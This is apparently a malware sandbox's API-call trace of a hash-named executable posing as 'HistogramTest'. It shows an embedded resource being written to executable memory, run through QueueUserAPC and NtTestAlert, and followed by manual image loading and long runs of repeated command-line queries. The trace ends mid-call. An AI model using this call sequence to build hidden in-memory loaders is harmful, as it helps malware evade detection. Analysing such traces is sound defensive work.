[0075.615] SendMessageA (hWnd=0xf01d4, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0075.615] GetWindow (hWnd=0xf01d4, uCmd=0x2) returned 0x0 [0075.615] GetDlgItem (hDlg=0x20386, nIDDlgItem=57670) returned 0x0 [0075.615] GetSystemMenu (hWnd=0x20386, bRevert=0) returned 0x302c3 [0075.616] LoadStringA (in: hInstance=0x400000, uID=0x65, lpBuffer=0x19f574, cchBufferMax=256 | out: lpBuffer="&About HistogramTest...") returned 0x17 [0075.667] lstrlenA (lpString="&About HistogramTest...") returned 23 [0075.668] AppendMenuA (hMenu=0x302c3, uFlags=0x800, uIDNewItem=0x0, lpNewItem=0x0) returned 1 [0075.669] AppendMenuA (hMenu=0x302c3, uFlags=0x0, uIDNewItem=0x10, lpNewItem="&About HistogramTest...") returned 1 [0075.669] LoadLibraryW (lpLibFileName="sc.exe") returned 0x6b0000 [0075.855] LdrFindResource_U (in: BaseAddress=0x400000, ResourceInfo=0x19f658, Level=0x3, ResourceDataEntry=0x19f674 | out: ResourceDataEntry=0x19f674) returned 0x0 [0075.855] LdrAccessResource (in: BaseAddress=0x400000, ResourceDataEntry=0x435648, Resource=0x19f670, Size=0x19f688 | out: Resource=0x19f670*=0x4489b4, Size=0x19f688) returned 0x0 [0075.855] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x3bd33, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2040000 [0075.857] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2040000, lpBuffer=0x4489b4*, nSize=0x3bd33, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4489b4*, lpNumberOfBytesWritten=0x0) returned 1 [0075.868] RtlAllocateHeap (HeapHandle=0x2250000, Flags=0x0, Size=0x6100) returned 0x2256160 [0075.869] RtlAllocateHeap (HeapHandle=0x2250000, Flags=0x0, Size=0x6100) returned 0x2260048 [0075.892] GetCurrentThread () returned 0xfffffffe [0075.892] QueueUserAPC (pfnAPC=0x2040000, hThread=0xfffffffe, dwData=0x0) returned 0x1 [0075.892] NtTestAlert () [0075.982] GetNativeSystemInfo (in: lpSystemInfo=0x19f300 | out: lpSystemInfo=0x19f300*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0075.983] VirtualAlloc (lpAddress=0x0, dwSize=0x3f000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0075.988] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x778f0000 [0075.988] GetProcAddress (hModule=0x778f0000, lpProcName="qsort") returned 0x7796d050 [0075.989] GetProcAddress (hModule=0x778f0000, lpProcName="bsearch") returned 0x7796c280 [0075.989] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74650000 [0075.989] GetProcAddress (hModule=0x74650000, lpProcName="VirtualProtect") returned 0x74667a50 [0075.989] GetProcAddress (hModule=0x74650000, lpProcName="IsBadReadPtr") returned 0x74662510 [0075.989] GetProcAddress (hModule=0x74650000, lpProcName="LoadLibraryW") returned 0x7466a840 [0075.989] GetProcAddress (hModule=0x74650000, lpProcName="SetLastError") returned 0x74662af0 [0075.989] GetProcAddress (hModule=0x74650000, lpProcName="HeapAlloc") returned 0x77922bd0 [0075.989] GetProcAddress (hModule=0x74650000, lpProcName="HeapFree") returned 0x74661ba0 [0075.989] GetProcAddress (hModule=0x74650000, lpProcName="GetProcessHeap") returned 0x74667710 [0075.990] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAlloc") returned 0x74667810 [0075.990] GetProcAddress (hModule=0x74650000, lpProcName="VirtualFree") returned 0x74667600 [0075.990] GetProcAddress (hModule=0x74650000, lpProcName="VirtualQuery") returned 0x74667a90 [0075.990] GetProcAddress (hModule=0x74650000, lpProcName="FreeLibrary") returned 0x74669f50 [0075.990] GetProcAddress (hModule=0x74650000, lpProcName="GetProcAddress") returned 0x746678b0 [0075.990] GetProcAddress (hModule=0x74650000, lpProcName="LoadLibraryExA") returned 0x7466a270 [0075.990] GetProcAddress (hModule=0x74650000, lpProcName="LoadLibraryA") returned 0x74674bf0 [0075.990] VirtualProtect (in: lpAddress=0x21f1000, dwSize=0x1800, flNewProtect=0x20, lpflOldProtect=0x19f2f4 | out: lpflOldProtect=0x19f2f4*=0x4) returned 1 [0075.993] VirtualProtect (in: lpAddress=0x21f3000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x19f2f4 | out: lpflOldProtect=0x19f2f4*=0x4) returned 1 [0075.994] VirtualProtect (in: lpAddress=0x21f4000, dwSize=0x39800, flNewProtect=0x4, lpflOldProtect=0x19f2f4 | out: lpflOldProtect=0x19f2f4*=0x4) returned 1 [0075.994] VirtualProtect (in: lpAddress=0x222e000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x19f2f4 | out: lpflOldProtect=0x19f2f4*=0x4) returned 1 [0075.994] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0075.996] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x75160000 [0077.769] LoadLibraryW (lpLibFileName="oledlg.dll") returned 0x6cfd0000 [0078.236] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76150000 [0078.240] LoadLibraryW (lpLibFileName="OLEPRO32.dll") returned 0x6caf0000 [0078.581] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0078.582] GetProcAddress (hModule=0x74650000, lpProcName="GetNativeSystemInfo") returned 0x7466ac70 [0078.582] GetNativeSystemInfo (in: lpSystemInfo=0x19f20c | out: lpSystemInfo=0x19f20c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0078.582] VirtualAlloc (lpAddress=0x400000, dwSize=0x3b000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0078.582] VirtualAlloc (lpAddress=0x0, dwSize=0x3b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2360000 [0078.582] GetProcessHeap () returned 0x700000 [0078.582] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x40) returned 0x713430 [0078.582] VirtualAlloc (lpAddress=0x2360000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2360000 [0078.582] VirtualAlloc (lpAddress=0x2361000, dwSize=0x39400, flAllocationType=0x1000, flProtect=0x4) returned 0x2361000 [0078.589] VirtualProtect (in: lpAddress=0x2361000, dwSize=0x39400, flNewProtect=0x40, lpflOldProtect=0x19f1a8 | out: lpflOldProtect=0x19f1a8*=0x4) returned 1 [0078.675] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x19a0bc | out: BaseAddress=0x19a0bc*=0x75160000) returned 0x0 [0078.728] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-com-l1-1-0.dll", BaseAddress=0x199be4 | out: BaseAddress=0x199be4*=0x754b0000) returned 0x0 [0078.733] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-com-l1-1-0.dll", BaseAddress=0x199be4 | out: BaseAddress=0x199be4*=0x754b0000) returned 0x0 [0078.863] GetNativeSystemInfo (in: lpSystemInfo=0x199c10 | out: lpSystemInfo=0x199c10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0078.875] GetStartupInfoW (in: lpStartupInfo=0x19a464 | out: lpStartupInfo=0x19a464*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0078.941] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x199c58, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe")) returned 0x62 [0078.941] VirtualAlloc (lpAddress=0x0, dwSize=0x3600, flAllocationType=0x3000, flProtect=0x40) returned 0x6e0000 [0078.942] VirtualAlloc (lpAddress=0x10000000, dwSize=0x3000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000 [0078.942] VirtualAlloc (lpAddress=0x10001000, dwSize=0x1400, flAllocationType=0x1000, flProtect=0x40) returned 0x10001000 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.943] GetLastError () returned 0x0 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.943] GetLastError () returned 0x0 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.943] GetLastError () returned 0x0 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.943] GetLastError () returned 0x0 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.943] GetLastError () returned 0x0 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.943] GetLastError () returned 0x0 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.943] GetLastError () returned 0x0 [0078.943] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.944] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.944] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.945] GetLastError () returned 0x0 [0078.945] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.946] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.946] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.947] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.947] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () 